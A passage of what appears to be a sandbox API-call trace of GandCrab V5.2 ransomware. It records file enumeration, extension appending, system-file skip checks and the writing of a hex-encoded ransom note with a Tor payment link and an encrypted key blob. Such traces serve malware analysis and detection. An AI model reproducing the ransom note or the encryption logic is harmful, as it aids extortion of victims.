39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0070.218] CloseHandle (hObject=0x2b4) returned 1 [0070.219] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.219] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.219] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x20f)) [0070.219] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.219] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.219] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.219] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.220] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0070.221] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.221] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.221] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\") returned 49 [0070.221] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*" [0070.221] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503338 [0070.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.221] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.222] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.222] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.222] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.222] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock" [0070.222] lstrlenW (lpString=".titwmvjl") returned 9 [0070.222] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.222] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.222] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 82 [0070.222] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.222] lstrlenW (lpString=".lock") returned 5 [0070.222] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.222] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.222] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.222] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.223] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.223] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.223] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.223] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt" [0070.223] lstrlenW (lpString=".titwmvjl") returned 9 [0070.223] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt") returned 69 [0070.223] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.223] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 78 [0070.223] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt") returned 69 [0070.223] lstrlenW (lpString=".txt") returned 4 [0070.223] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.223] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.223] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.223] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.223] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt") returned 69 [0070.223] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\TITWMVJL-DECRYPT.txt") returned 69 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.223] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.224] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.224] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.224] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.224] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.224] lstrcmpW (lpString1="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2=".") returned 1 [0070.224] lstrcmpW (lpString1="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2="..") returned 1 [0070.224] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\", lpString2="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" [0070.224] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\" [0070.224] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.224] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.224] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.225] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.225] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.225] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.225] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.225] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\\\TITWMVJL-DECRYPT.txt") returned 109 [0070.225] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\{ca8ca1bb-f2a6-4e9c-b7cc-fb56671763e8}\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0070.226] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\